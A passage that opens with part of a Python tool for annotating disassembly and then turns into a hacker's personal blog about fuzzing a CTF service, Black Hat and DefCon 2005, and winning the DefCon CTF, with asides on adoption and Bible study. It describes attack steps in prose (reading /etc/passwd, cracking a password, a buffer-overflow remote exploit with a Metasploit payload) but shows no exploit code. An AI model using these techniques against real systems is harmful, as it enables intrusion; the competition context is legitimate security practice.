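            slots.setdefault(slot_name(_offset(m)), []).append(i.addr)
    return slots


def annotate(listing):
    """Return the listing with slot names inlined and jump arrows appended."""
    insns = parse(listing)
    edges = jump_edges(insns)
    targets = {dst for _, dst, _ in edges}
    out = []
    for i in insns:
        ops = EBP_RE.sub(lambda m: '%s{%s}' % (m.group(0), slot_name(_offset(m))), i.ops)
        tail = ''.join('  --> %x (%s)' % (dst, kind)
                       for src, dst, kind in edges if src == i.addr)
        if i.addr in targets:
            tail += '  <-- target'
        out.append('%x: %-6s %s%s' % (i.addr, i.mnem, ops, tail))
    return out


if __name__ == '__main__':
    print('\n'.join(annotate(SAMPLE)))
    for name, addrs in sorted(frame_slots(parse(SAMPLE)).items()):
        print('%-10s %s' % (name, ' '.join('%x' % a for a in addrs)))
```

On the sample, the backward `jl` at 804842c to 804840f is the while edge, the forward `jne` at 804841c is the if that skips the store, and `local_4` shows up at every instruction that touches the loop counter, which is exactly the "look for %reg storage AFTER this line" pass done mechanically. Feed it real `objdump -d` output (AT&T syntax, 32-bit) and it works the same way; 64-bit `%rbp` frames would need the regex widened.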
So I sit down at a coffeeshop I don't frequently visit, because Skeletones (Coffee for the coming apocalypse!) is having a concert I'm too focused to enjoy. I end up sitting in 5 different spots throughout the night, making them hate the "bottomless mug" deal I chose, and being slightly distracted as the two employees mash right at the counter. I was expecting some wetware to come out but thankfully was wrong. After doing some Biblestudy (which is the real reason for my night out), I figure out that I left my reverse-dump hardcopy at work and they had all my scribblings and notes! SUCK BUTT! So, I tinkered and played. Probably the best thing, since I happened upon the "chink in the armor" by doing so. I continued having bad results until I changed approaches in fuzzing and reveng. more on that in a minute.
If this all seems a bit confusing, it's because I'm still somewhat unsure of what went wrong... I know that I was unable to produce consistent results when piping "perl -e" commands to netcat. I know I was able to produce some consistency with a total rewrite in perl. I also know that I've been rather cavalier with my fuzzing, which probably caused issues with consistency (not paying close attention to having multiple threads going at once, so long as I kept data pumping into my gdb/echod session for analysis). Again, ni puta idea!
This perl/bash combo was similar to what I used with poor results:
I first started getting consistent results when I scrapped the command-line approach and used Perl's networking Socket interface to handle the network connectivity. Not as "slim" as using NetCat, but it works. And I was able to build the loop for fuzzing right into my perl-based sploit engine rather than the ugly bash code listed above. But consistency is key.
I have to take back all the evil wicked things I cursed about the author of echod. He may still be an evil bastard, but not nearly so much as I was giving him credit for. (sorry Visi)
Thanks to the nologin folks (thanks slow!) for helping me figure out the stack alignment oddities. Many thanks to Visigoth, Snit and the other kenshoto guys for the hours of wholesome fun ;D
I still have a few questions bouncing around:
* How do I get gdb to hold on to Display and Breakpoint settings between sessions (or perhaps simply preload them from a file at startup)?
* How do I get a service like echod to dump core? (a core dump is the contents of program memory at the time of a program fault. It allows a debugger to recreate the environment to better troubleshoot and correct issues)
Any comments can be sent to atlas@r4780y.com (thanks for the account, r4780y!)
@
Well, my friends. At last the week has come and gone. My family has done without me for 9 days, I've done without sleep for most of that, and my lips are swollen from desperately locking onto the firehose!
Web Application InSecurity
Starting out the week with NGS Software and Special Ops Security in the popular Web Application Software class. Two days was a little short for the original class, but it didn't lack. I was bored at first since they actually cover things as foreign to most developers as network topology and the security implications thereof. This has been my specialty for the past 4+ years.
I regained consciousness once we got started into the security aspects of web apps and server configs, though. Since these guys are pen-testers, not just security instructors, their approach was refreshing, and took on much of the feel of an actual penetration test. I was rudely awakened by seemingly mundane things such as web server logging, when realizing how little useful information is logged by default when malicious code bangs it senseless. I guess I assumed that, but what I found intriguing were the settings to turn on valuable stuff!
Command Injection, SQL Injection, etc... It's all in there, and they didn't skimp on covering any of the good stuff. Each of the presenters was obviously accomplished in their field, and Chris Paget, the main instructor, even gave us a demo of his non-public time-based SQL injection tool, something that returns real data from the database server even when error messages are blocked by using time-based encoding. Very slick stuff indeed.
More on Chris later.
Drinking at BH/DC
I was fortunate enough to eat and drink with some of the greatest names in the security field, and that includes Mr. Paget. While checking into the hotel, a large man lumbers up behind me lugging some hefty computer equipment. I think my comment was "There can only be one reason you're here, what class are you taking?" He informed me that he was teaching Web App (In)Security. I laughed and introduced myself as being in his class the next day. When time came for him to meet friends and have a beer, I asked to accompany him. Little did I know who I would be drinking with. Great people (and names you'll recognize) such as David Litchfield (Jr. and Sr.), Marc Litchfield, Timothy Mullin, Eli O (whose card titles him "Grand Visier" of BH/DC), Erik Pace Birkholz and the rest of the SpecialOps (who co-taught the class), the rest of NGS, including Markus and Gunter, who is leaving NGS to take over technical leadership of another large company that has floundered in recent years (good luck to you Gunter!).
Overall they were great fun to hang out with and the conversations were very interesting, even covering politics and faith. Ahhh, the wonders of alcohol and tobacco. Throughout the week I was also fortunate enough to drink with Mudge (who is very interesting and likeable), Simple Nomad, my dear friend Jay Beale (who has a nasty little Sushi habit!), Dan Kaminsky, and many others who I leave off only for brevity, not unimportance. Indeed I've left out many who are very dear to my heart. Oh, what the hack! If you've reached your limit, skip this...
Greetz to Plato, Steven, Structure, Robb, individual, Toby and Amber!, Doc Brown and the Plan B crew, Jason, Darwin's Bastards (yo, guys!), TheArrogantSnit, Invisigoth, HackerJoe, Bob, Satori, Verbal, John, any other Kenshoto guys I may have missed, Nicole and Richard from NTO.
I must admit, however, that while being bold enough to converse with well-known people like they were normal people (a duh!) is great, I don't think some people are used to it. One person half way through the week asked me who the f*ck I was (I didn't take it badly, but it was curious). He said that when asked, everyone basically said that they thought I was *their* friend. When I asked if he thought me a social engineer, he said "Yes, exactly! not that that is necessarily a bad thing..." heh. Amusing times.
One of the highlights of the week was deep conversations with Chris Paget, particularly about weaknesses of current computer intelligence theory. Very unfortunately Chris had to leave early for personal reasons. He was definitely missed.
Another highlight had to be Microsoft's twin-parties. One at the Pure (Caesars Palace) and a followup at the Tangerine (Treasure Island). Not only did I get to meet and chat with awesome people, including HDMoore and Kevin Mitnick, but the night was topped off by watching Jay Beale and his unique and energetic dance moves! Heck, he even got *me* out on the dance floor.
Briefings
Wow, what a rush! First off, I've never seen so much alcohol on stage.
But beyond that, let's discuss the firehose I've been drinking!
Starting the morning off with David Litchfield discussing advanced SQL injection techniques, including time-based, as well as Oracle patching woes. Aside from some frustration over sound difficulties David was brilliant.
Mudge gave a talk on (what I think of as) basic-hacker-think... but the focus was on "functional fixation" and "learned immobility"... ie. who ever thought a plane could be a weapon!? Well, somebody did. The rest of us likely suffered from functional fixation. Short of a few meanderings not directly related to the topic Mudge proved he can handle lack of sleep and alcohol *very* well!
Spoonm and Skape from the MetaSploit Framework project were exceptional! They may have hit the basics of shellcoding a little too much for certain members of the crowd, but I can't say enough good things about the work they were detailing. I couldn't help but stick around afterward and catch the slides they felt compelled to skip to save time. Suffice it to say that Distributed Ninja and Meterpreter are payloads I will be learning in the near future. I did learn the unfortunate news that they will be forcing me to learn Ruby if I want to contribute (or read) Msf 3.0. I hear Ruby's great, but that's not a new theme for me (see Python/KenShoto later on). dN and Meterpreter are the next evolution of Syscall proxies, basically a snippet of code which accepts code from your system and executes it on the remote machine. Nothing is written to disk and Meterpreter even allows you to "migrate" which process they run in. dN runs on Linux, Meterpreter runs on Windows. They also clarified just what "stagers" are.
One of the stars of the show was definitely Johnny Long (johnny.ihackstuff.com). While I have a long history of appreciating Johnny, his speech was no let down. Particularly his wit when finding "googledorks". I really liked the comments about government findings ;) Buy Johnny's book. It's bound to be amusing and informative!
Not all Black Hat Briefings were as interesting to me. I attended one speaker who must have been a college professor (look and droning speech) who spoke on restricted computing environments, or sandboxes. While the potential impact was decent and the material could have been interesting (and he had *really cool* transitions in his preso), his presentation method lacked gusto and I was underwhelmed. Many folks didn't wait it out and left. I stuck around but to no avail.
DefCon
Yes, I know... I've already worn you out before getting to the good part. The truth is, I was so heads-down involved in the Capture the Flag (CTF) hacking competition that I don't have much to say.
The Kenshoto hacker group took over the CTF this year after the longstanding "Ghetto Hackers" hosts decided to retire. This being my first DefCon I can't speak to the transition. All I can say is that Kenshoto did an absolutely incredible job. There were some flubs along the way and yes, it cost me time, but overall I was so amazed at the complete package they put together, their thoroughness, that I can't even complain. They even included a feedback session afterwards so we could discuss how things turned out. I found it amusing that they did this prior to anyone learning who had won ;) Better that way, I think. What was so amazing?
From the moment I walked into the access-controlled room I felt like I was walking into a high-intensity playground/dance-club. Dim lights, technothrash music, the Black/Green color scheme, and the Blue siren-light all contributed to a feeling of greatness. The Kenshoto guys had their stuff together, even down to the green on black Kenshoto t-shirts which had different phrases each day...
Each night Caezar hosted parties which combined technogeeks with alcohol and saw amusing results. I was only able to catch two of the three parties, but the two I attended were pretty cool. Saturday I sat next to Dan Kaminsky and a Microsoft employee and bashed and postured and laughed until it hurt. That and discussions of Python being better than Perl (I'm not convinced yet), and of course watching Eli O dance while magically keeping two or three acrylic spheres afloat and tracing around his body-parts... they all contributed to a great time. Sunday's party was around pool 2 at the Alexis Park hotel, and enhanced by tossing a glow-stick inside the 1-gallon juice jug filled with liquor-surprise... Tossing that around was probably more fun than the beach-balls. I got a chance to slow down and have a cool talk with Snit from Kenshoto, and ponder the impact of moving from my current address to the Virginia area. hmmmmm...... Tempting.
Falling asleep while _____ (version 2)
Well, I'm home now. After two hours sleep on Sunday, the plane rides were filled with the stuff. I intended to continue reversing CTF binaries, but alas that never happened. I just got around to that last night.
During the CTF Qualification round I found myself sleep-typing. At 5am it's amazing what the fingers have to say when you stop ordering them around and let their creative side show. "SegFailt os if it weren' groumedeor"
Well, since being home, I think I've topped it. I have actually fallen asleep while reading to my kids! "blah blah bla", he said............. <"daddy? Who said? Daddy???"> DOH!
Hopefully after some recovery I'll be able to better fit this new-found habit into my life without such extreme consequences.
By now, everyone is normally asking the question "How did you do at the CTF?" https://www.kenshoto.com/scores.html
Short and skinny? I didn't do nearly as well as I wished I had. And I won the individual (Ronin) contest, beating most of the teams.
Many thanks to those around me who I made alliances with, particularly the Darwin's Bastards, and of course my dear friend Plato, who very well could have beaten me. Greetz to the Shellphish and Sk3wl of R00t teams for a job very well done.
I won? and I'm not happy with that? Frankly, no. And it's not because I didn't beat the two top teams. It's about "my game" and no one else. I could have done more and done better and faster. I have much improvement to do this next year, and it can only come from more practice and better skillz. Why am I not happy? Because I resorted to lamer tactics of "low-hanging fruit" and social engineering rather than more challenging things. "Bottom line" is that I did what it took to win, but it's like playing defensive pool rather than simply shooting well. Next year I hope to run the table off the break.
Special nod to the friends I will keep out of this, especially Plato, Robb, Chris Paget, J-sLam, Snit and Invisigoth, drb and Toby.
The last three weeks have been amazing and awful at the same time.
Two and a half weeks ago my wife and I picked up our adoptive daughter from the hospital! She's wonderful and tiring. Why did we do this? Kids need a loving home. Not all of them get them. Why a newborn? Wow... good question. Newborns are the reminder that something can be wonderful and terrible at the same time. Baby Abigail is an adorable little girl, mother from Zimbabwe, father is African-American. Apparently adoptive parents who are willing to adopt interracially are few, so we found out about our little wonder the day of our homestudy (the last part of adoption before the infamous "holding pattern"), 10 days before her due date! Standard time for waiting is between six months and two years. We are very blessed.
The wonderment did not stop there. And Biggel(her handle) is only responsible for half of my sleep-deprivation.
Friday, June 3rd saw the 10pm kick-off of the DefCon Hacking Capture-The-Flag (CTF) competition qualifying round. The new carriers of the DefCon CTF flag are the KenShoto group, and my hat's off to them. They did a great job!
Like a moron, I invited college friends to bring their three kids to visit for the weekend. They are not hackers... So, in order to avoid being rude (and incurring my wife's wrath) I relegated my hacking activities to post-bedtime... Friday and Saturday I didn't see the pillow before my ordinary alarm-clock setting. Surprising how 5:30am looks similar whether you're getting up or going to bed ;)
First stage was fun, with an easily hackable web-application using a hidden field and limited input-validation. It just took the appropriate amount of poking and guesswork. Finding the key was easy, so long as you took the logical route of grabbing /etc/passwd for all the information it contains. To be honest, I missed it. The "flag" was stored as the name of one of the users. I apparently was too busy looking for "real" information. In that respect, it was somewhat of a gimme, on the way to really hacking. I had already cracked a password and logged in before actually seeing the stage 1 key. The stage 2 key was provided when I logged in with the hacked user account. I was having fun already.
Stage 3 was much more difficult, and thus ultimately much more rewarding, and a great deal of the wonderment of my week. Logging into the account to get the stage 2 key, a binary file was pasted to my screen, the screen was blanked, the key was printed to my screen and I was logged out. Hmmmph.
That binary, upon inspection, appeared to be the program offering a service on port 6969. Attaining stage 3 meant finding a vulnerability in the binary and writing a remote exploit. As a talented security professional, this was still the territory of immortals. I nearly gave up when I realized what was required. I didn't.
I've been reading Erickson's book, "HACKING: The Art of Exploitation". Great book, but I had hit a dry patch (and been distracted by many other aspects of life) about page 20. It was dry because I knew it already... Given the challenge at hand, I looked in the table of contents to find buffer overflows (BOF) (which is the vulnerability-type I had determined to use). It started on page 23. DOH! So I quickly started back at page 20 and continued into the section on exploiting BOFs.
HTAE not only includes in-depth discussions of the hacking techniques, but provides examples which you can test and play with. Hands-on hacking. Nothing over the network (at least not where I was reading), but definitely enough to get started. That, coupled with a VMware installation of FreeBSD (the OS used on the "hackable" machine) and some debugging/reverse-engineering tools, and my blood/sweat/tears created a wholly original exploit (ok, so the payload was gratuitously stolen from the MetaSploit framework, thanks guys!) but I made the mechanics work.
I felt as if Ben Kenobi himself patted me on the shoulder and said "You've just taken your first step into a bigger world." But it was the KenShoto guys (Snit, Invisigoth) who congratulated me. I think they took pity on me, since they realized I was a sploit-virgin.
Hacking the Word: The process of learning more and understanding the scripture better than the average joe. Hacking is about knowledge and understanding, exploring and devouring. The use of such knowledge is really superfluous to the actual meaning of hacking.
Hacking the Word is going beyond the normally accepted platitudes and trite phrases of religiosity, much like poking and prodding IIS to see what undisclosed "goodies" it has to offer, past that which mere mortals choose to accept. Much like Hacking computer systems, Exploiting the Word lies in how you make use of it. Scouring the Word to find the unknown gems (or just proving them for yourself) will yield interesting brain-fodder for discussion, digestion, and a perspective which is lacking in this world of despair and mortality. 'leet Word-Hackers find riches without the threat of prison (at least for the moment). Hacking the Word can be more difficult and even more intriguing than computer hacking. In order to understand the Word, it takes more than just finding an unchecked buffer and overwriting a return address. It requires context, which means that an understanding of the whole source code is important. That's why hacking teams are formed, which are able to bring the experience of many to the table for discussion. Often these hacking groups are led by experienced Word-Hackers, but they tend not to be exclusionary. leet-ness is gained through knowledge, not exclusion. The best line I've heard from one of these groups is "Don't take _my_ word for it. _Prove_me_wrong_!"
About a year ago I was introduced to new toolz and introduced to a new methodology to studying the writings of God's dudes (aka Biblos or the Bible, which means book). I attribute the new toolz and methodology to divine inspiration since nobody really "taught" me. I was met with a new way to get depth of understanding, at the same time I found a driving passion to learn more than what I'd been taught growing up.
The ensuing "devouring" of the Word led to intriguing discoveries and understandings. Many of the principles had been taught to me since birth, but the context and word-origins were refreshingly new and gave me the ability to take a skeptic's view on the "obvious" meaning.
The Sword provides many types of modules in many different languages. Being Open Sourced and openly available, the NIV is not an option (apparently the copyright owner supports a lot of missions work with the royalties). I've found I like the WEB (World English Bible) for readability. I tie that to the King James Version (yes, like a parallel bible) because the KJV has ties to "Strong's Numbers" which are an indexing and defining of the original Greek or Hebrew words! Talk about using the Source, Luke! Since I have not been able to learn either of those languages to any real extent, using the definitive definition, and being able to compare word numbers between verses with like words, has been incredibly eye-opening. English jumbles and combines words; for instance, there are 8 definitions of "Love" in the Hebrew language, two definitions of the verb "to Know" in Spanish, etc...
Kate has also added to my experience! Kate is the MDI advanced text editor of the KDE project. Why does Kate make that big a deal? Well, I've been pretty lax about taking notes during BibleStudies and Church Sermons. Kate makes it simple to at the *very least* keep track of Bible verses in use throughout the teaching. That way, even if I don't agree with the interpretation or usage I can always return later and do more digging. Since that time, I've found a reason to get up early in the morning and spend time with the Architect, learning about the Creator and communing/submitting myself to His will. In fact, that's where I'm going right now.
Oh, by the way... I believe I have qualified for the Capture the Flag in July! So, if you're in Vegas the last weekend of July, stop by Def Con and we'll meet. You can email me ahead of time at atlas_THAT_AT_THINGY_r4780y.com